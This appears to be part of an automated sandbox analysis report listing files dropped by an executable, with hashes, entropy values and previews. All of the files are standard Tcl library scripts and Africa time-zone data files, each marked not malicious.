                                                                                                                                                                                                                              Preview:# Tcl package index file, version 1.1..# This file is generated by the "pkg_mkIndex -direct" command..# and sourced either when an application starts up or..# by a "package unknown" script. It invokes the..# "package ifneeded" command to set up package-related..# information so that packages will be loaded automatically..# in response to "package require" commands. When this..# script is sourced, the variable $dir must contain the..# full path name of this file's directory.....if {![package vsatisfies [package provide Tcl] 8.5-]} {return}..package ifneeded opt 0.4.8 [list source [file join $dir optparse.tcl]]..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23995
                                                                                                                                                                                                                              Entropy (8bit):4.884828325514459
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:8xgjLNILEHsdAW2UfnImRqXqux6XmihmCchzPLrXJjJh6PLfzdklG:8xgjLNImsdnvIm86uGLhLchzDzJ9h6Dn
                                                                                                                                                                                                                              MD5:DDB0AB9842B64114138A8C83C4322027
                                                                                                                                                                                                                              SHA1:ECCACDC2CCD86A452B21F3CF0933FD41125DE790
                                                                                                                                                                                                                              SHA-256:F46AB61CDEBE3AA45FA7E61A48930D64A0D0E7E94D04D6BF244F48C36CAFE948
                                                                                                                                                                                                                              SHA-512:C0CF718258B4D59675C088551060B34CE2BC8638958722583AC2313DC354223BFEF793B02F1316E522A14C7BA9BED219531D505DE94DC3C417FC99D216A01463
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# package.tcl --..#..# utility procs formerly in init.tcl which can be loaded on demand..# for package management...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval tcl::Pkg {}....# ::tcl::Pkg::CompareExtension --..#..# Used internally by pkg_mkIndex to compare the extension of a file to a given..# extension. On Windows, it uses a case-insensitive comparison because the..# file system can be file insensitive...#..# Arguments:..# fileName.name of a file whose extension is compared..# ext..(optional) The extension to compare against; you must..#..provide the starting dot...#..Defaults to [info sharedlibextension]..#..# Results:..# Returns 1 if the extension matches, 0 otherwise....proc tcl::Pkg::CompareExtension {fileName {ext {}}} {.. global tcl_platfor
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):844
                                                                                                                                                                                                                              Entropy (8bit):4.883013702569192
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TF7S2n2wn2SNHaeYF9xcwrmXhbs1GUiSYX3EtSK78ex4VIpynEw88/McUBbPgnz:TF7Hn2wnlk2KwyZSM4SkV/3UB7Cz
                                                                                                                                                                                                                              MD5:577787C2F4F5956BA70F83012B980AE5
                                                                                                                                                                                                                              SHA1:040B2469F796F3FDFCD1E1DD2EB1C5B799EDEF62
                                                                                                                                                                                                                              SHA-256:E269029C8263E3CBC1920C3604ECDCF15EDCCB208A0D68F9EB42B73954D620C0
                                                                                                                                                                                                                              SHA-512:C2940F6F3D77412EFC537B8AB67352F519DFFA95739FCC17BF1817335AFD9E5BFE91ABE98CBA99E278CB4923D4E6D431ED9D72282745203C0F7D73193F550238
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# parray:..# Print the contents of a global array on stdout...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc parray {a {pattern *}} {.. upvar 1 $a array.. if {![array exists array]} {...return -code error "\"$a\" isn't an array".. }.. set maxl 0.. set names [lsort [array names array $pattern]].. foreach name $names {...if {[string length $name] > $maxl} {... set maxl [string length $name]...}.. }.. set maxl [expr {$maxl + [string length $a] + 2}].. foreach name $names {...set nameString [format %s(%s) $a $name]...puts stdout [format "%-*s = %s" $maxl $nameString $array($name)].. }..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42223
                                                                                                                                                                                                                              Entropy (8bit):4.822635446297551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:H/Jo8y7AyARYhZfc3njlVdRIp4xOtoYx4WneNiBq5vIhfwEaqadlUCJ2Pbb1P6:H/c7AmhZmnjvdRIG924WneNiBq5+fwEc
                                                                                                                                                                                                                              MD5:B8C1561D471CFBF4111C706411D59883
                                                                                                                                                                                                                              SHA1:71483EAEEF377EE9AF90BEC44F70C7B12C5BC720
                                                                                                                                                                                                                              SHA-256:C21DCE3AB31893118BBED01E559070F1D3541877FEE331BD45F5BF4300ED9654
                                                                                                                                                                                                                              SHA-512:465065A938C71AF4588B3331B51A62DD57F57492EB1CB6C0F52B9FD0A2FE7A54B1E995AA56E4A41D7A99EAFF665C1E23E3B240FB3F9840AB242C21B1DBFFFF45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# safe.tcl --..#..# This file provide a safe loading/sourcing mechanism for safe interpreters...# It implements a virtual path mechanism to hide the real pathnames from the..# child. It runs in a parent interpreter and sets up data structure and..# aliases that will be invoked when used from a child interpreter...#..# See the safe.n man page for details...#..# Copyright (c) 1996-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....#..# The implementation is based on namespaces. These naming conventions are..# followed:..# Private procs starts with uppercase...# Public procs are exported and starts with lowercase..#....# Needed utilities package..package require opt 0.4.8....# Create the safe namespace..namespace eval ::safe {.. # Exported API:.. namespace export interpCreate interpInit interpConfigure interpDelete \...interpAddToAccessPath interpFindInAccessPath setL
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5617
                                                                                                                                                                                                                              Entropy (8bit):4.747404679682368
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eOaVhNUMUuUQU2UsUIUbUEUEeUkgU6UWSO0DT5RTdcvsilrvs+jscMK57ehXowrz:ejVHRRLP3LWDXewTbSO0DT5RTdcvsilg
                                                                                                                                                                                                                              MD5:C62FB22F4C9A3EFF286C18421397AAF4
                                                                                                                                                                                                                              SHA1:4A49B8768CFF68F2EFFAF21264343B7C632A51B2
                                                                                                                                                                                                                              SHA-256:DDF7E42DEF37888AD0A564AA4F8CA95F4EEC942CEBEBFCA851D35515104D5C89
                                                                                                                                                                                                                              SHA-512:558D401CB6AF8CE3641AF55CAEBC9C5005AB843EE84F60C6D55AFBBC7F7129DA9C58C2F55C887C3159107546FA6BC13FFC4CCA63EA8841D7160B8AA99161A185
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Tcl autoload index file, version 2.0..# -*- tcl -*-..# This file is generated by the "auto_mkindex" command..# and sourced to set up indexing information for one or..# more commands. Typically each line is a command that..# sets an element in the auto_index array, where the..# element name is the name of a command and the value is..# a script that loads the command.....set auto_index(auto_reset) [list source [file join $dir auto.tcl]]..set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]]..set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]]..set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.t
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12204
                                                                                                                                                                                                                              Entropy (8bit):4.763796758810551
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:55CjnlRfMKqaOH5bE2KjNkkpgpCmqkkuowUh9PTYMsvSO+xy8h/vuKisM68E:5q3MKYH5bE1jNkkpgomq/uCPTYMC+k83
                                                                                                                                                                                                                              MD5:215262A286E7F0A14F22DB1AA7875F05
                                                                                                                                                                                                                              SHA1:66B942BA6D3120EF8D5840FCDEB06242A47491FF
                                                                                                                                                                                                                              SHA-256:4B7ED9FD2363D6876092DB3F720CBDDF97E72B86B519403539BA96E1C815ED8F
                                                                                                                                                                                                                              SHA-512:6ECD745D7DA9D826240C0AB59023C703C94B158AE48C1410FAA961A8EDB512976A4F15AE8DEF099B58719ADF0D2A9C37E6F29F54D39C1AB7EE81FA333A60F39B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# -*- tcl -*-..#..# Searching for Tcl Modules. Defines a procedure, declares it as the primary..# command for finding packages, however also uses the former 'package unknown'..# command as a fallback...#..# Locates all possible packages in a directory via a less restricted glob. The..# targeted directory is derived from the name of the requested package, i.e...# the TM scan will look only at directories which can contain the requested..# package. It will register all packages it found in the directory so that..# future requests have a higher chance of being fulfilled by the ifneeded..# database without having to come to us again...#..# We do not remember where we have been and simply rescan targeted directories..# when invoked again. The reasoning is this:..#..# - The only way we get back to the same directory is if someone is trying to..# [package require] something that wasn't there on the first scan...#..# Either..# 1) It is there now: If we rescan, you get it; if not you don
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):147
                                                                                                                                                                                                                              Entropy (8bit):4.995501022397479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2DcsBdNMXGm2OHnFvpsYoHsdSalHFLwy:SlSWB9eg/2DBpDm2OHnFvmYoH1alHOy
                                                                                                                                                                                                                              MD5:FF8B5540631A6EE93507338C4E7AA49D
                                                                                                                                                                                                                              SHA1:817B261A1B6B92AA498EC286349964EA10FB5A84
                                                                                                                                                                                                                              SHA-256:7213997BB9CF9D384A7002B8C8EFEF25C01ABA6083D9835A16D583D5DCEE40A0
                                                                                                                                                                                                                              SHA-512:8D78AC4868ED0013EDA536C0E82E0E91398772AA18C637AEFE22F24B142FCDA55A4CB853B2282951E907C9E2F62BD3F831A5CF995F52898F5225D16889943A9C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Abidjan) {.. {-9223372036854775808 -968 0 LMT}.. {-1830383032 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.832432925672155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dc9XfBQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DUGDBS
                                                                                                                                                                                                                              MD5:52FDFD3DB98475FBBB620D0D5565C5CC
                                                                                                                                                                                                                              SHA1:C7750452859663605272553DBEE0B6C134E1517C
                                                                                                                                                                                                                              SHA-256:6040827AFED8CEF45F252FBD7E3E862C0B5E9D06C1C98C58BAD61DFE67BD57CC
                                                                                                                                                                                                                              SHA-512:2FF9D96D81279148A86BE208FEEACCBCB8B4224D093D6C092ECD1C4EA2186589CCF947027D3A726600C703611B4CFEE029AA14ED3E8593C477B427C4F342CF27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Accra) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.817170256300069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DczqIVDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DnaDkO
                                                                                                                                                                                                                              MD5:30CDD4D37E9DD60FBF6D754C9343F364
                                                                                                                                                                                                                              SHA1:56F896C21068764B7B8F884F374B18913CA3D9CA
                                                                                                                                                                                                                              SHA-256:E11FD8AD8572B684333810CFDC23B92E1ACF619875866985E288D92F8277D07F
                                                                                                                                                                                                                              SHA-512:78FC8043CCE25713404E70996229E5EA8238BF5C0F59029064EDA5494E2D4F54398931F3D855E30C82B2C53B789C40EE4CBF09D0F98C2BA6734595D4AA75017A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1080
                                                                                                                                                                                                                              Entropy (8bit):4.187497782275587
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862D7nmdHh5Cv6/lHY8SOSuvvzXipFSgSO5vW5aKmvbsF6VWsXN87QBWcAFy:5veSvKlHYXNujXipFSjKRKXiWsXCGWJy
                                                                                                                                                                                                                              MD5:E8D3DF11CE0E7575485573FA07D955D5
                                                                                                                                                                                                                              SHA1:3B2C00C85B6C0BFAA1C676C970D6DF1B4BDC3D4A
                                                                                                                                                                                                                              SHA-256:E6874647561CE1C5FD1F650C9B167F77AC5B24FD2026046399A9043CF998E5C4
                                                                                                                                                                                                                              SHA-512:E2968BE847622CF243C0E498436FD21BDC2E1DF0FD8D694F2C70569D17CE896CDE4968BB8ABDEF9F687439E4EA2D955AE87D6C15E81F881EE1413416A90765D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Algiers) {.. {-9223372036854775808 732 0 LMT}.. {-2486592732 561 0 PMT}.. {-1855958961 0 0 WET}.. {-1689814800 3600 1 WEST}.. {-1680397200 0 0 WET}.. {-1665363600 3600 1 WEST}.. {-1648342800 0 0 WET}.. {-1635123600 3600 1 WEST}.. {-1616893200 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585443600 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1531443600 0 0 WET}.. {-956365200 3600 1 WEST}.. {-950486400 0 0 WET}.. {-942012000 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796262400 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766630800 3600 0 CET}.. {-733280400 0 0 WET}.. {-439430400 3600 0 CET}.. {-212029200 0 0 WET}.. {41468400 3600 1 WEST}.. {54774000 0 0 WET}.. {231724800 3600 1 WEST}.. {246240000 3600 0 CET}.. {259545600 7200 1 CEST}.. {275274000 3600 0 CET}.. {309740400 0 0 WET}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.801054282631739
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjEUEH+DcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DGs+DR
                                                                                                                                                                                                                              MD5:A543BDEB3771017421FB75231F0004F2
                                                                                                                                                                                                                              SHA1:D682C58C27562FF3ABAB8EDE8EB6EA754DA7C02E
                                                                                                                                                                                                                              SHA-256:064EB7F9A1FA05A317C6BDCA6B102BC1560D980758F9E4DDB010C9E7DC068ECB
                                                                                                                                                                                                                              SHA-512:44848D60EDC79AF784A819714C0D9F62DCCB6329B47F25D74AB8C174BF9EC3F783C66FEB27F588A93FABA9BECAF076F453D6D797CE4F28461F7AE69440EA54C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmara) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.806258322241929
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcjAWDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2D8DkOn
                                                                                                                                                                                                                              MD5:1B5E386E7A2F10D9385DE4C5683EBB85
                                                                                                                                                                                                                              SHA1:FECBA599C37493D2E0AEE8E21BAB40BF8E8DC82A
                                                                                                                                                                                                                              SHA-256:76939852A98EA7BF156D0AC18B434CC610DAF5232322C0FBB066CD52C5B72AF7
                                                                                                                                                                                                                              SHA-512:B36FABFCDB2187A3A4A211C8E033D96C91E3C4D47907D284E10786555562C82231566033EAB4753EF1E48DF1233CFC8C6C0FB3CA50748BE0B2554A972A88FBA0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Asmera) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.883634030944169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcxAQDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwNDBS
                                                                                                                                                                                                                              MD5:6B9BB5B37C41AA727E31BF03483DC1CA
                                                                                                                                                                                                                              SHA1:CB3BBA37B063EA4A54CD15C6E30C14D8CA30D3C0
                                                                                                                                                                                                                              SHA-256:F6D1BA22115A6565B6D6ABEB578F001DDB41E673C422C8EA70D0DF77B24115F6
                                                                                                                                                                                                                              SHA-512:23DB3E298FDEB165FD85D99E03C00835B584984B814AF7F54A9CDD4A9F93E16B0C58342D319129F46CF8EC36F93DE5EA51B492CA4CABDAB75D84709BC6C26119
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Bamako) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.882974805254803
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2Dcx2m/2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dw/2D4yn
                                                                                                                                                                                                                              MD5:92FF9E5835C0C80F358BFE69120660A0
                                                                                                                                                                                                                              SHA1:724758B43BD79DD8A29B02BE6910D492924F8280
                                                                                                                                                                                                                              SHA-256:5047A507D22B68C9349EB6A48C41C80DB4C69F98F99C6574059DEA87178E36C0
                                                                                                                                                                                                                              SHA-512:6FCB709DB4AC19191FECE1E8BAC55E77F265B5AF89F7A3565F06BFAF0BEE12E3EAF2F52CA09C68D75C358C25A31867505CE8AD75D7386DCD15F4BE1CE61272CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Bangui) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.888193386512119
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2Dcx79FHp4DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dw7J4c
                                                                                                                                                                                                                              MD5:46E5703CF284E44E15E5872DF075FCBC
                                                                                                                                                                                                                              SHA1:EA4BFA6D568DFA877F72302ADA21ECC2840D9FD5
                                                                                                                                                                                                                              SHA-256:77E610A02CCECE3045B09D07A9BE6100F5AA9C3C2AEB543535C9AE941194F4E4
                                                                                                                                                                                                                              SHA-512:1454467FE63E97DFA4DE66E359F68B2D80C92CDE59FC15A4BE513629FFD154D2281EADF3FC78F7AFDDF5A5896195F3A69E66697A659BBB1A0EAFD3E1DA6565EC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Banjul) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.847843768169462
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2Dc5iDMXGm2OHGVkeoHsdSawwF6hSVPVFwy:SlSWB9eg/2D4uDm2OHCkeoH1awwFMmMy
                                                                                                                                                                                                                              MD5:7E710C939B9CC0C1AC1ECF4239B543C5
                                                                                                                                                                                                                              SHA1:429CC87086FB22727815ED05AC6472333FF06013
                                                                                                                                                                                                                              SHA-256:2A870E534DE67713C27F2F3B9BF26FA7498C240CF633988CE76DBDAC5B69214D
                                                                                                                                                                                                                              SHA-512:70D9365C31C43A95211FC20E9290B24D356FFEFA935B8829CE32831026A196DECDD12226097F6DA3B4B919E137AA0181714680CDBB72B00C130A87E3A4735004
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Bissau) {.. {-9223372036854775808 -3740 0 LMT}.. {-1830380400 -3600 0 -01}.. {157770000 0 0 GMT}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.904342145830274
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2Dc8ycXp75h4DcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DAmp1hs
                                                                                                                                                                                                                              MD5:7AD3749D7047855CB9B9EC9696015402
                                                                                                                                                                                                                              SHA1:F792359AD9EEC2ABD98DAFA6661C1E57BAB89EBE
                                                                                                                                                                                                                              SHA-256:8F700409B8EEE33ACE5F050414971FFEE0270949842E58E9299BB5CD6CCF34DE
                                                                                                                                                                                                                              SHA-512:681C1B318746C587DEBA6E109D1D5A99D1F3E28FE46C24F36B69D533D884FDDC6EA35BB31A475575D683B73BF129FED761523EC9285F2FF1E4CACA2C54C046C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Maputo)]} {.. LoadTimeZoneFile Africa/Maputo..}..set TZData(:Africa/Blantyre) $TZData(:Africa/Maputo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.901235831565769
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DciE0TMJZp4DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2D4qGp4D1
                                                                                                                                                                                                                              MD5:7028268EE88250AC40547A3FDBBFC67C
                                                                                                                                                                                                                              SHA1:5006D499CD1D1CB93EB3DA0EC279F76B7123DAA6
                                                                                                                                                                                                                              SHA-256:596DB2D64CDD6250642CB65514D5BCB52F3E3EA83F50D8915D9D4FDEA008F440
                                                                                                                                                                                                                              SHA-512:D623C69FE8A6050E77FB819C2F5FAEE35D5034182B1D30A409C17208155501656133E774E402875537335F8201E4734A0B5D327712CBF623AC330F1014D9025B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Brazzaville) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):184
                                                                                                                                                                                                                              Entropy (8bit):4.947752840781864
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsfKG5XHAIgNGEjKORL/2DclbDcfKB:SlSWB9vsM3y7fnHAIgNTjdN/2DkbDEi
                                                                                                                                                                                                                              MD5:0EBC2D8F0BD1A32C21070F9397EAC9E2
                                                                                                                                                                                                                              SHA1:95AAA97427265635784E8AC624CA863DB9F1475D
                                                                                                                                                                                                                              SHA-256:9A15867255B43A954CA60DA11660F157553AAB6A15C50ACD49D182276E0CF4CC
                                                                                                                                                                                                                              SHA-512:4CD2E14F84C58E955742637A51D99DB9493972671A2B5D801EBD9D901D4903654E374C59BF010C70071D33FA17788358F78004201A787CCA2AD714D670393488
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
